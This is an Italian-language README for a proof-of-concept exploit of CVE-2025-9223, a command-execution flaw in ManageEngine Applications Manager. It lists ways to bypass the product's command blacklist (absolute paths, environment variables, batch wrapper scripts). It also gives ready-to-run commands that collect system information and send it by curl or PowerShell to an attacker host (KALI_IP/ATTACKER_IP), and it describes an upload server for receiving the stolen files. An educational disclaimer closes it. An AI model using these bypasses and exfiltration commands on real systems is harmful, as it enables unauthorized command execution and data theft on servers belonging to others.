
POC CVE-2025-9223
Questo repository contiene una Prova di Concetto (PoC) che dimostra una vulnerabilità di esecuzione di comandi nella funzione "Execute Program Action" di ManageEngine Applications Manager.
Applications Manager utilizza una lista nera (BlackListCommands) per bloccare comandi pericolosi, ma la validazione presenta gravi difetti:
| Metodo | Esempio |
|---|---|
| Percorso Assoluto | C:\Windows\System32\netstat.exe |
| Variabili d'Ambiente | %SystemRoot%\System32\netstat.exe |
| Script Wrapper | echo netstat > a.bat && a.bat |
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload
Lo script upload_server.py fornisce un semplice server HTTP per ricevere file esfiltrati.
python3 upload_server.py
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads
--host: Indirizzo di bind (predefinito: 0.0.0.0)--port: Porta HTTP (predefinita: 8000)--dir: Directory di output (predefinita: directory corrente)✅ Protezione contro il path traversal
✅ Nomi file univoci con timestamp
✅ Registrazione delle richieste con IP e User-Agent
✅ Validazione del tipo di contenuto
Crea un file test_commands.txt con esempi di bypass:
# Bypass con percorso assoluto
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an
# Bypass con variabili d'ambiente
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe
# Bypass con script wrapper
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat
# Esempi di esfiltrazione dati
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"
IMPORTANTE: Questo strumento è fornito esclusivamente a scopo educativo e per test autorizzati.
❌ NON usare su sistemi che non possiedi o per cui non hai il permesso esplicito di testare
❌ NON usare per alcuna attività illegale
✅ SÌ usare solo in ambienti controllati per la ricerca sulla sicurezza
✅ SÌ ottenere un'adeguata autorizzazione prima di effettuare test
L'autore non è responsabile di qualsiasi uso improprio di questo strumento. Gli utenti si assumono ogni responsabilità e rischio.
Questo progetto è solo a scopo di ricerca e educativo. Tutti i diritti riservati.
Johan Aybar - A scopo educativo
⚠️ PROMEMORIA: Questa PoC deve essere utilizzata esclusivamente in ambienti di test autorizzati. L'uso non autorizzato può essere illegale ed è severamente vietato.
| Metodo | Endpoint | Descrizione |
|---|
| GET | / | Elenca i file caricati di recente |
| POST | /upload | Carica file (multipart/form-data) |
| PUT | /upload/[filename] | Upload diretto di file |